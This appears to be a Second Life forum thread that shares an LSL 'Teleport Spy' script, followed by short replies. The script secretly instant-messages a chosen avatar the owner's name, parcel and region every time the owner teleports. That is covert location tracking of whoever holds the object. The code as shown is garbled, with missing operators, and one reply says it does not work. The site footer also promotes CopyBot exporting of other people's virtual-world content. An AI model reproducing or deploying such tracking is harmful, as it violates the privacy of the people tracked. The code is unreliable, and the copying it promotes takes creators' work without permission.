spy script

Thread Started By steadymobbin

4517
4
  • 56 Vote(s) - 2.95 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Rate Thread
#1
Work only in the root prim

PHP Code:
// Teleport Spy v1.00 by Sax for Kinggoon.net members

//////////////////////START EDIT PART//////////////////////////////
key spy ""//UUID of the spy
////////////////////////END EDIT PART//////////////////////////////

string parcel;

update()
{
    
parcel llList2String(llGetParcelDetails(llGetPos(), [PARCEL_DETAILS_NAME]), 0);
}

default
{
    
on_rez(integer p)
    {
        
llResetScript();
    }
    
state_entry()
    {
        
update();
    }
    
changed(integer change)
    {
        if(
change & (CHANGED_REGION CHANGED_TELEPORT))
        {
            
string owner llKey2Name(llGetOwner());
            
string region llGetRegionName();
            
update();
            
llInstantMessage(spyowner  " it is teleported has "+  parcel " in the region " region);
        }
    }

[Image: guns-bullet-shirt_recreated.jpg]
Reply


#2
doesn't work
Reply


#3
yayayayayaya
Reply


#4
yayayayayayaya
Reply


#5
Thanks for the share!  But for us non-scripters, could you explain what this does?  "SPY" is a very generic term.
Reply




Forum Jump:

1 Guest(s)
Share this:

About Second Life Copybot

Second Life CopyBot Forum is a place where you can get items for Second Life and other vitual worlds for free. With our CopyBot viewers you can export and import any content from these virtual worlds and modify them in 3D software such as Blender, 3D studio Macx etc...